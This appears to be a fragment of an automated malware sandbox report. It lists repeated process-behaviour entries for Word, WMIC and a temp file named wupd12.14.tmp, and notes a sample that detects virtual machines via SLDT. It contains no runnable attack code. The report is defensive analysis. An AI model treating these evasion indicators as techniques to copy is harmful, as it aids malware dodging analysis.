Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect virtual machines (SLDT)Show sources